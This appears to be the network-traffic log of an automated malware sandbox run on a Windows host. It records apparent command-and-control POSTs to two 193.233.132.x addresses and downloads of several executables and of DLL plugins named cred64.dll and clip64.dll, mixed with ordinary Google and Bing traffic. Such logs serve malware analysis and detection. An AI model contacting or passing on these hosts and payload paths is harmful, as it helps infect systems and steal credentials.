accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 350BA4A5571A486D803814C7B9FBA84B Ref B: AMS04EDGE2718 Ref C: 2024-04-27T17:07:30Z
content-length: 0
date: Sat, 27 Apr 2024 17:07:30 GMT
set-cookie: _EDGE_S=SID=0CCD0984AA79622819C61DEAABFA6312; path=/; httponly; domain=bing.com
set-cookie: MUIDB=39284F0CA7EB6DE029235B62A60B6CFA; path=/; httponly; expires=Thu, 22-May-2025 17:07:30 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.be3d3e17.1714237650.112e0ca5
-
Remote address:8.8.8.8:53Request8.8.8.8.in-addr.arpaIN PTRResponse8.8.8.8.in-addr.arpaIN PTRdnsgoogle
-
Remote address:8.8.8.8:53Request237.197.79.204.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request73.159.190.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request240.221.184.93.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request194.61.62.23.in-addr.arpaIN PTRResponse194.61.62.23.in-addr.arpaIN PTRa23-62-61-194deploystaticakamaitechnologiescom
-
Remote address:193.233.132.139:80RequestPOST /sev56rkm/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.139
Content-Length: 4
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 27 Apr 2024 17:07:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
-
Remote address:193.233.132.139:80RequestPOST /sev56rkm/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.139
Content-Length: 158
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 27 Apr 2024 17:07:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:193.233.132.139:80RequestPOST /sev56rkm/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.139
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 27 Apr 2024 17:07:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:193.233.132.139:80RequestPOST /sev56rkm/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.139
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 27 Apr 2024 17:07:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:193.233.132.139:80RequestPOST /sev56rkm/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.139
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 27 Apr 2024 17:07:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:193.233.132.139:80RequestPOST /sev56rkm/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.139
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 27 Apr 2024 17:07:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:193.233.132.167:80RequestGET /cost/sarra.exe HTTP/1.1
Host: 193.233.132.167
ResponseHTTP/1.1 200 OK
Date: Sat, 27 Apr 2024 17:07:32 GMT
Content-Type: application/octet-stream
Content-Length: 2374144
Last-Modified: Sat, 27 Apr 2024 15:51:14 GMT
Connection: keep-alive
ETag: "662d1ef2-243a00"
Accept-Ranges: bytes
-
Remote address:193.233.132.167:80RequestGET /mine/amert.exe HTTP/1.1
Host: 193.233.132.167
ResponseHTTP/1.1 200 OK
Date: Sat, 27 Apr 2024 17:07:34 GMT
Content-Type: application/octet-stream
Content-Length: 1895424
Last-Modified: Sat, 27 Apr 2024 15:51:47 GMT
Connection: keep-alive
ETag: "662d1f13-1cec00"
Accept-Ranges: bytes
-
Remote address:193.233.132.167:80RequestGET /mine/random.exe HTTP/1.1
Host: 193.233.132.167
ResponseHTTP/1.1 200 OK
Date: Sat, 27 Apr 2024 17:07:36 GMT
Content-Type: application/octet-stream
Content-Length: 1166336
Last-Modified: Sat, 27 Apr 2024 15:50:45 GMT
Connection: keep-alive
ETag: "662d1ed5-11cc00"
Accept-Ranges: bytes
-
Remote address:193.233.132.167:80RequestGET /cost/random.exe HTTP/1.1
Host: 193.233.132.167
ResponseHTTP/1.1 200 OK
Date: Sat, 27 Apr 2024 17:07:38 GMT
Content-Type: application/octet-stream
Content-Length: 2413056
Last-Modified: Sat, 27 Apr 2024 15:50:59 GMT
Connection: keep-alive
ETag: "662d1ee3-24d200"
Accept-Ranges: bytes
-
Remote address:8.8.8.8:53Request139.132.233.193.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request167.132.233.193.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestwww.youtube.comIN AResponsewww.youtube.comIN CNAMEyoutube-ui.l.google.comyoutube-ui.l.google.comIN A142.250.179.238youtube-ui.l.google.comIN A142.250.180.14youtube-ui.l.google.comIN A142.250.187.206youtube-ui.l.google.comIN A142.250.187.238youtube-ui.l.google.comIN A142.250.178.14youtube-ui.l.google.comIN A172.217.16.238youtube-ui.l.google.comIN A142.250.200.14youtube-ui.l.google.comIN A142.250.200.46youtube-ui.l.google.comIN A216.58.201.110youtube-ui.l.google.comIN A216.58.204.78youtube-ui.l.google.comIN A216.58.212.206
-
Remote address:142.250.179.238:443RequestGET /account HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
sec-ch-ua-arch: "x86"
sec-ch-ua-platform-version: "10.0.0"
sec-ch-ua-model: ""
sec-ch-ua-bitness: "64"
sec-ch-ua-wow64: ?0
sec-ch-ua-full-version-list: "Chromium";v="110.0.5481.104", "Not A(Brand";v="24.0.0.0", "Google Chrome";v="110.0.5481.104"
x-client-data: CJHdygE=
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:8.8.8.8:53Requestaccounts.google.comIN AResponseaccounts.google.comIN A173.194.69.84
-
Remote address:8.8.8.8:53Request195.187.250.142.in-addr.arpaIN PTRResponse195.187.250.142.in-addr.arpaIN PTRlhr25s33-in-f31e100net
-
Remote address:8.8.8.8:53Request234.187.250.142.in-addr.arpaIN PTRResponse234.187.250.142.in-addr.arpaIN PTRlhr25s34-in-f101e100net
-
Remote address:8.8.8.8:53Request238.179.250.142.in-addr.arpaIN PTRResponse238.179.250.142.in-addr.arpaIN PTRlhr25s31-in-f141e100net
-
Remote address:8.8.8.8:53Requestcontent-autofill.googleapis.comIN AResponsecontent-autofill.googleapis.comIN A172.217.16.234content-autofill.googleapis.comIN A142.250.200.10content-autofill.googleapis.comIN A142.250.200.42content-autofill.googleapis.comIN A216.58.201.106content-autofill.googleapis.comIN A216.58.204.74content-autofill.googleapis.comIN A216.58.212.202content-autofill.googleapis.comIN A172.217.169.74content-autofill.googleapis.comIN A142.250.179.234content-autofill.googleapis.comIN A142.250.180.10content-autofill.googleapis.comIN A142.250.187.202content-autofill.googleapis.comIN A142.250.187.234content-autofill.googleapis.comIN A142.250.178.10
-
GEThttps://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTEwLjAuNTQ4MS4xMDQSHgmA6QC9dWevzxIFDRkBE_oSBQ3oIX6GEgUN05ioBw==?alt=protochrome.exeRemote address:172.217.16.234:443RequestGET /v1/pages/ChVDaHJvbWUvMTEwLjAuNTQ4MS4xMDQSHgmA6QC9dWevzxIFDRkBE_oSBQ3oIX6GEgUN05ioBw==?alt=proto HTTP/2.0
host: content-autofill.googleapis.com
x-goog-encode-response-if-executable: base64
x-goog-api-key: AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
x-client-data: CJHdygE=
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:8.8.8.8:53Requestaccounts.youtube.comIN AResponseaccounts.youtube.comIN CNAMEwww3.l.google.comwww3.l.google.comIN A172.217.16.238
-
Remote address:8.8.8.8:53Request84.69.194.173.in-addr.arpaIN PTRResponse84.69.194.173.in-addr.arpaIN PTRef-in-f841e100net
-
Remote address:8.8.8.8:53Request3.180.250.142.in-addr.arpaIN PTRResponse3.180.250.142.in-addr.arpaIN PTRlhr25s32-in-f31e100net
-
Remote address:8.8.8.8:53Request227.212.58.216.in-addr.arpaIN PTRResponse227.212.58.216.in-addr.arpaIN PTRlhr25s28-in-f31e100net227.212.58.216.in-addr.arpaIN PTRams16s22-in-f3227.212.58.216.in-addr.arpaIN PTRams16s22-in-f227
-
Remote address:8.8.8.8:53Request234.16.217.172.in-addr.arpaIN PTRResponse234.16.217.172.in-addr.arpaIN PTRlhr48s28-in-f101e100net234.16.217.172.in-addr.arpaIN PTRmad08s04-in-f10
-
GEThttps://accounts.youtube.com/accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=1201792650&timestamp=1714237659684chrome.exeRemote address:172.217.16.238:443RequestGET /accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=1201792650&timestamp=1714237659684 HTTP/2.0
host: accounts.youtube.com
sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "110.0.5481.104"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0.0"
sec-ch-ua-model: ""
sec-ch-ua-bitness: "64"
sec-ch-ua-wow64: ?0
sec-ch-ua-full-version-list: "Chromium";v="110.0.5481.104", "Not A(Brand";v="24.0.0.0", "Google Chrome";v="110.0.5481.104"
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
x-client-data: CJHdygE=
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://accounts.google.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=YS5PzM7dWFk
cookie: VISITOR_INFO1_LIVE=dZ-UnFWGjCk
cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgLQ%3D%3D
-
GEThttps://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=110.0.5481.104&lang=en-US&acceptformat=crx3&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.76.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D1%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D1%2526e%253D1chrome.exeRemote address:172.217.16.238:443RequestGET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=110.0.5481.104&lang=en-US&acceptformat=crx3&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.76.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D1%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D1%2526e%253D1 HTTP/2.0
host: clients2.google.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:8.8.8.8:53Requestwww.google.comIN AResponsewww.google.comIN A142.250.178.4
-
Remote address:8.8.8.8:53Request238.16.217.172.in-addr.arpaIN PTRResponse238.16.217.172.in-addr.arpaIN PTRlhr48s28-in-f141e100net238.16.217.172.in-addr.arpaIN PTRmad08s04-in-f14
-
Remote address:8.8.8.8:53Request4.178.250.142.in-addr.arpaIN PTRResponse4.178.250.142.in-addr.arpaIN PTRlhr48s27-in-f41e100net
-
Remote address:8.8.8.8:53Requestclients2.google.comIN AResponseclients2.google.comIN CNAMEclients.l.google.comclients.l.google.comIN A172.217.16.238
-
Remote address:8.8.8.8:53Requestplay.google.comIN AResponseplay.google.comIN A142.250.187.206
-
Remote address:142.250.187.206:443RequestOPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/2.0
host: play.google.com
accept: */*
access-control-request-method: POST
access-control-request-headers: x-goog-authuser
origin: https://accounts.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
sec-fetch-mode: cors
sec-fetch-site: same-site
sec-fetch-dest: empty
referer: https://accounts.google.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:8.8.8.8:53Request206.187.250.142.in-addr.arpaIN PTRResponse206.187.250.142.in-addr.arpaIN PTRlhr25s33-in-f141e100net
-
Remote address:8.8.8.8:53Request86.23.85.13.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request56.126.166.20.in-addr.arpaIN PTRResponse
-
Remote address:193.233.132.167:80RequestPOST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 27 Apr 2024 17:08:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:193.233.132.167:80RequestPOST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 158
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 27 Apr 2024 17:08:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:193.233.132.167:80RequestGET /enigma/Plugins/cred64.dll HTTP/1.1
Host: 193.233.132.167
ResponseHTTP/1.1 200 OK
Date: Sat, 27 Apr 2024 17:08:12 GMT
Content-Type: application/octet-stream
Content-Length: 1285632
Last-Modified: Thu, 01 Feb 2024 16:00:36 GMT
Connection: keep-alive
ETag: "65bbc024-139e00"
Accept-Ranges: bytes
-
Remote address:193.233.132.167:80RequestGET /enigma/Plugins/clip64.dll HTTP/1.1
Host: 193.233.132.167
ResponseHTTP/1.1 200 OK
Date: Sat, 27 Apr 2024 17:08:23 GMT
Content-Type: application/octet-stream
Content-Length: 112128
Last-Modified: Thu, 01 Feb 2024 16:00:35 GMT
Connection: keep-alive
ETag: "65bbc023-1b600"
Accept-Ranges: bytes
-
Remote address:8.8.8.8:53Request17.14.97.104.in-addr.arpaIN PTRResponse17.14.97.104.in-addr.arpaIN PTRa104-97-14-17deploystaticakamaitechnologiescom
-
Remote address:193.233.132.167:80RequestPOST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 21
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 27 Apr 2024 17:08:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
-
Remote address:193.233.132.167:80RequestPOST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 5
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 27 Apr 2024 17:08:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:8.8.8.8:53Request249.197.17.2.in-addr.arpaIN PTRResponse249.197.17.2.in-addr.arpaIN PTRa2-17-197-249deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Requestbeacons.gcp.gvt2.comIN AResponsebeacons.gcp.gvt2.comIN CNAMEbeacons-handoff.gcp.gvt2.combeacons-handoff.gcp.gvt2.comIN A192.178.49.163
-
Remote address:192.178.49.163:443RequestPOST /domainreliability/upload HTTP/2.0
host: beacons.gcp.gvt2.com
content-length: 300
content-type: application/json; charset=utf-8
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
access-control-allow-methods: POST
access-control-allow-origin: *
date: Sat, 27 Apr 2024 17:09:43 GMT
content-type: text/html
content-type: text/html
access-control-allow-headers: Content-Type
access-control-allow-methods: POST
access-control-allow-origin: *
content-type: text/html
-
Remote address:192.178.49.163:443RequestOPTIONS /domainreliability/upload-nel HTTP/2.0
host: beacons.gcp.gvt2.com
origin: https://accounts.google.com
access-control-request-method: POST
access-control-request-headers: content-type
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
access-control-allow-methods: POST
access-control-allow-origin: *
date: Sat, 27 Apr 2024 17:09:43 GMT
content-type: text/html
content-type: text/html
access-control-allow-headers: Content-Type
access-control-allow-methods: POST
access-control-allow-origin: *
content-type: text/html
-
Remote address:192.178.49.163:443RequestPOST /domainreliability/upload-nel HTTP/2.0
host: beacons.gcp.gvt2.com
content-length: 405
content-type: application/reports+json
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:8.8.8.8:53Request163.49.178.192.in-addr.arpaIN PTRResponse163.49.178.192.in-addr.arpaIN PTRphx19s05-in-f31e100net
-
Remote address:8.8.8.8:53Request48.229.111.52.in-addr.arpaIN PTRResponse
-
204.79.197.237:443https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8DEiB3BpqH80lQh3h0OFLSTVUCUyVIwR3suggEvtxpKmgPP_bHpttlnvEz61mrVmr1xSwB0-b5US2mU9qDwBonDPEu9q2_1jXrkqdtEGpIX6v8P-8cmDswVn0v6l1XjkZvLXozNK4LKciaAPuaY3neL6kwH5awU2eF1xRwzy2WLBNgzPx%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D03f3332a0a201c1abc345501a3f8558e&TIME=20240426T131952Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893&muid=465F5D2AB0629966D2D4950980DD8E0Etls, http22.5kB 9.0kB 20 17
HTTP Request
GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8DEiB3BpqH80lQh3h0OFLSTVUCUyVIwR3suggEvtxpKmgPP_bHpttlnvEz61mrVmr1xSwB0-b5US2mU9qDwBonDPEu9q2_1jXrkqdtEGpIX6v8P-8cmDswVn0v6l1XjkZvLXozNK4LKciaAPuaY3neL6kwH5awU2eF1xRwzy2WLBNgzPx%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D03f3332a0a201c1abc345501a3f8558e&TIME=20240426T131952Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893&muid=465F5D2AB0629966D2D4950980DD8E0EHTTP Response
204HTTP Request
GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8DEiB3BpqH80lQh3h0OFLSTVUCUyVIwR3suggEvtxpKmgPP_bHpttlnvEz61mrVmr1xSwB0-b5US2mU9qDwBonDPEu9q2_1jXrkqdtEGpIX6v8P-8cmDswVn0v6l1XjkZvLXozNK4LKciaAPuaY3neL6kwH5awU2eF1xRwzy2WLBNgzPx%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D03f3332a0a201c1abc345501a3f8558e&TIME=20240426T131952Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893&muid=465F5D2AB0629966D2D4950980DD8E0EHTTP Response
204 -
23.62.61.194:443https://www.bing.com/aes/c.gif?RG=a7a89982c8dd4b0786daab865ebdfa30&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T131952Z&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893tls, http21.5kB 5.4kB 17 12
HTTP Request
GET https://www.bing.com/aes/c.gif?RG=a7a89982c8dd4b0786daab865ebdfa30&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T131952Z&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893HTTP Response
200 -
1.9kB 2.1kB 16 13
HTTP Request
POST http://193.233.132.139/sev56rkm/index.phpHTTP Response
200HTTP Request
POST http://193.233.132.139/sev56rkm/index.phpHTTP Response
200HTTP Request
POST http://193.233.132.139/sev56rkm/index.phpHTTP Response
200HTTP Request
POST http://193.233.132.139/sev56rkm/index.phpHTTP Response
200HTTP Request
POST http://193.233.132.139/sev56rkm/index.phpHTTP Response
200HTTP Request
POST http://193.233.132.139/sev56rkm/index.phpHTTP Response
200 -
274.8kB 8.1MB 5794 5793
HTTP Request
GET http://193.233.132.167/cost/sarra.exeHTTP Response
200HTTP Request
GET http://193.233.132.167/mine/amert.exeHTTP Response
200HTTP Request
GET http://193.233.132.167/mine/random.exeHTTP Response
200HTTP Request
GET http://193.233.132.167/cost/random.exeHTTP Response
200 -
1.0kB 8.4kB 10 10
-
2.2kB 10.7kB 17 20
HTTP Request
GET https://www.youtube.com/account -
172.217.16.234:443https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTEwLjAuNTQ4MS4xMDQSHgmA6QC9dWevzxIFDRkBE_oSBQ3oIX6GEgUN05ioBw==?alt=prototls, http2chrome.exe1.9kB 7.0kB 16 17
HTTP Request
GET https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTEwLjAuNTQ4MS4xMDQSHgmA6QC9dWevzxIFDRkBE_oSBQ3oIX6GEgUN05ioBw==?alt=proto -
172.217.16.238:443https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=110.0.5481.104&lang=en-US&acceptformat=crx3&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.76.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D1%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D1%2526e%253D1tls, http2chrome.exe3.2kB 25.8kB 25 34
HTTP Request
GET https://accounts.youtube.com/accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=1201792650&timestamp=1714237659684HTTP Request
GET https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=110.0.5481.104&lang=en-US&acceptformat=crx3&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.76.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D1%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D1%2526e%253D1 -
953 B 4.8kB 8 9
-
142.250.187.206:443https://play.google.com/log?format=json&hasfast=true&authuser=0tls, http2chrome.exe1.7kB 8.5kB 14 15
HTTP Request
OPTIONS https://play.google.com/log?format=json&hasfast=true&authuser=0 -
49.5kB 1.4MB 1042 1041
HTTP Request
POST http://193.233.132.167/enigma/index.phpHTTP Response
200HTTP Request
POST http://193.233.132.167/enigma/index.phpHTTP Response
200HTTP Request
GET http://193.233.132.167/enigma/Plugins/cred64.dllHTTP Response
200HTTP Request
GET http://193.233.132.167/enigma/Plugins/clip64.dllHTTP Response
200 -
403 B 351 B 5 3
HTTP Request
POST http://193.233.132.167/enigma/index.phpHTTP Response
200 -
386 B 891 B 5 4
HTTP Request
POST http://193.233.132.167/enigma/index.phpHTTP Response
200 -
3.4kB 8.0kB 27 28
HTTP Request
POST https://beacons.gcp.gvt2.com/domainreliability/uploadHTTP Request
OPTIONS https://beacons.gcp.gvt2.com/domainreliability/upload-nelHTTP Request
POST https://beacons.gcp.gvt2.com/domainreliability/upload-nelHTTP Response
200HTTP Response
200 -
953 B 5.8kB 8 8
-
999 B 8.4kB 9 10
-
56 B 151 B 1 1
DNS Request
g.bing.com
DNS Response
204.79.197.23713.107.21.237
-
66 B 90 B 1 1
DNS Request
8.8.8.8.in-addr.arpa
-
73 B 143 B 1 1
DNS Request
237.197.79.204.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
73.159.190.20.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
240.221.184.93.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
95.221.229.192.in-addr.arpa
-
71 B 135 B 1 1
DNS Request
194.61.62.23.in-addr.arpa
-
74 B 129 B 1 1
DNS Request
139.132.233.193.in-addr.arpa
-
74 B 129 B 1 1
DNS Request
167.132.233.193.in-addr.arpa
-
61 B 271 B 1 1
DNS Request
www.youtube.com
DNS Response
142.250.179.238142.250.180.14142.250.187.206142.250.187.238142.250.178.14172.217.16.238142.250.200.14142.250.200.46216.58.201.110216.58.204.78216.58.212.206
-
65 B 81 B 1 1
DNS Request
accounts.google.com
DNS Response
173.194.69.84
-
74 B 112 B 1 1
DNS Request
195.187.250.142.in-addr.arpa
-
74 B 113 B 1 1
DNS Request
234.187.250.142.in-addr.arpa
-
74 B 113 B 1 1
DNS Request
238.179.250.142.in-addr.arpa
-
10.3kB 127.7kB 80 131
-
77 B 269 B 1 1
DNS Request
content-autofill.googleapis.com
DNS Response
172.217.16.234142.250.200.10142.250.200.42216.58.201.106216.58.204.74216.58.212.202172.217.169.74142.250.179.234142.250.180.10142.250.187.202142.250.187.234142.250.178.10
-
66 B 110 B 1 1
DNS Request
accounts.youtube.com
DNS Response
172.217.16.238
-
72 B 105 B 1 1
DNS Request
84.69.194.173.in-addr.arpa
-
72 B 110 B 1 1
DNS Request
3.180.250.142.in-addr.arpa
-
73 B 171 B 1 1
DNS Request
227.212.58.216.in-addr.arpa
-
73 B 142 B 1 1
DNS Request
234.16.217.172.in-addr.arpa
-
60 B 76 B 1 1
DNS Request
www.google.com
DNS Response
142.250.178.4
-
3.8kB 9.4kB 10 11
-
73 B 142 B 1 1
DNS Request
238.16.217.172.in-addr.arpa
-
72 B 110 B 1 1
DNS Request
4.178.250.142.in-addr.arpa
-
65 B 105 B 1 1
DNS Request
clients2.google.com
DNS Response
172.217.16.238
-
3.0kB 7.2kB 8 8
-
204 B 3
-
61 B 77 B 1 1
DNS Request
play.google.com
DNS Response
142.250.187.206
-
7.7kB 9.9kB 18 22
-
74 B 113 B 1 1
DNS Request
206.187.250.142.in-addr.arpa
-
70 B 144 B 1 1
DNS Request
86.23.85.13.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
